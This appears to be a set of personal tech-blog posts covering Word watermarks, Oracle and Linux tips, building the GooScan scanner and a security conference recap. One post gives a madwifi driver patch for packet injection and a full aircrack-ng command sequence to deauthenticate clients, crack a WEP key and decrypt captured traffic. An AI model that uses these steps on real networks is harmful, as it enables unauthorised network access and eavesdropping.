Using watermarks in word documents looks really cool. But the problem occurs when the documents become too big. In such cases, the document becomes exceedingly slow to react to scrolling. Adobe PDF conversion is an even bigger problem.
To remove the watermark it is simple enough : Format -> Background -> Printed Watermark. Then click on “No watermark” and you are golden (or you should be golden).
I’ve observed that the watermark does not get removed many times when you have too many sections in the document.
In such cases: Goto View -> Header and Footer. Click on “Show/Hide Document Text”.
You should see that all your text has disappeared except the watermark. Click on the watermark and you should be able to select it like a floating image. Press the “delete” key and lo! behold! the watermark is gone.
This took me a while to figure out and it was quite frustrating. I hope this post helps someone!

Copy paste the text shown below into a file called madwifing-r3876.patch.

--- madwifi/ath/if_ath.c  2008-11-07 01:05:07.000000000 -0500
+++ madwifi-patched/ath/if_ath.c   2008-11-06 17:56:59.000000000 -0500
@@ -3000,6 +3000,7 @@
 ath_tx_startraw(struct net_device *dev, struct ath_buf *bf, struct sk_buff *skb)
 {
        struct ath_softc *sc = dev->priv;
+       struct ieee80211com *ic = &sc->sc_ic;
        struct ath_hal *ah = sc->sc_ah;
        struct ieee80211_phy_params *ph = &(SKB_CB(skb)->phy);
        const HAL_RATE_TABLE *rt;
@@ -3012,7 +3013,8 @@
        struct ieee80211_frame *wh;

        wh = (struct ieee80211_frame *)skb->data;
-       try0 = ph->try[0];
+       //try0 = ph->try[0];
+        try0 = (ic->ic_opmode == IEEE80211_M_MONITOR) ? 1 : ph->try[0];
        rt = sc->sc_currates;
        txrate = dot11_to_ratecode(sc, rt, ph->rate[0]);
        power = ph->power > 60 ? 60 : ph->power;
@@ -3036,7 +3038,8 @@
        rt = sc->sc_currates;
        KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode));

-       if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+       //if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+        if (IEEE80211_IS_MULTICAST(wh->i_addr1) || ((ic->ic_opmode == IEEE80211_M_MONITOR) && (skb->data[1]&3) != 0x01) ) {
          flags |= HAL_TXDESC_NOACK;    /* no ack on broad/multicast */
          sc->sc_stats.ast_tx_noack++;
          try0 = 1;

Check out the madwifi driver as follows:

sudo ifconfig ath0 down
sudo ifconfig wifi0 down
svn -r 3876 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng
cd madwifi-ng
patch -Np1 -i ../madwifing-r3876.patch
sudo ./scripts/madwifi-unload
make
sudo make install
sudo depmod -ae
sudo modprobe ath_pci

These instructions are similar to the ones written here (for a different revision):
http://www.aircrack-ng.org/doku.php?id=madwifi-ng

If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap

Sometimes simplest of the errors get you bad….and this was one such time.
I was trying to connect to my Oracle XE DB using SQL*Plus but kept getting this errror

connect hr/************
ERROR:
ORA-01034: ORACLE not available
ORA-27101: shared memory realm does not exist

Turns out I did not start the DB instance.
Start -> All Programs -> Oracle Database 10g Express Edition -> Start Database

I was just browsing away when I stumbled upon Johnny Long’s GooScan. He says that this is a Linux only tool but it seems to compile (not without problems though) on cygwin.
I kept getting the following errors:

L:\tools\gooscan-v1.0.9>gcc gooscan.c
gooscan.c: In function `inet_send':
gooscan.c:575: error: `MSG_WAITALL' undeclared (first 
                       use in this function)
gooscan.c:575: error: (Each undeclared identifier is 
                       reported only once
gooscan.c:575: error: for each function it appears in.)

Then I read somewhere that MSG_WAITALL is not defined for Cygwin and that instead of that zero would work. There are many neater solutions to this…but I’m a hacker and I’ll do the stuff that’s easiest and hassle-free.
Some people say that the following will work:
#ifdef __CYGWIN__
#define MSG_WAITALL 0

So in order to compile this bad boy, you need to goto line 574 in your favorite editor.
It looks like this:
recv(sock, recvbuf, sizeof(recvbuf), MSG_WAITALL);

You need to make it look like this:
recv(sock, recvbuf, sizeof(recvbuf), 0);//MSG_WAITALL);

You are all set:
gcc gooscan.c -o gooscan.exe

Compilation works! But then I observed that the results were not coming well. However, if you run it through a local proxy such as burp it still works…I bet it has something to do with socket establishment and receiving and being incompatible with the MSG_WAITALL flag.
But as long as you can get the results … who cares? If someone figures out exactly how to make this work, please post it as a comment.

This has been a weird one, finding version information on the operating systems.
On Ubuntu, the following gets the version information
  cat /etc/issue
  cat /etc/lsb-release

On Linux, finding the kernel version
  uname -a
  cat /proc/version

On Windows, from Start-> Run -> cmd.exe
  winver
OR
  systeminfo

This is very simple but still there are a few times when memory fails and we’re not able to do the obvious.

To see the information about the hardware mapping :
  lshal

Finding your CPU Information
  cat /proc/cpuinfo

Finding memory information
  cat /proc/meminfo

Maximum number of SYN requests that the host will remember which did not receive an ACK from clients:
  cat /proc/sys/net/ipv4/tcp_max_syn_backlog

Finding data bus-size or bit-size i.e., whether my CPU is 32-bit or 64-bit:
  sudo lshw -C cpu | grep width

I recently came back from the ToorConX in San Diego, CA. It was a great conference with some really cool talks. Especially RFD (Remote file download using blind sql injection), reversing malware using browser hooking, cracking crypt() hashes using Ps3, grey box peach fuzz xml generation tool (nunchaku), voip eavesdropping, bypassing browser memory protection.
These were some really cool talks but I still don’t have access to any presentation slides yet for the con. May be those will be posted some time.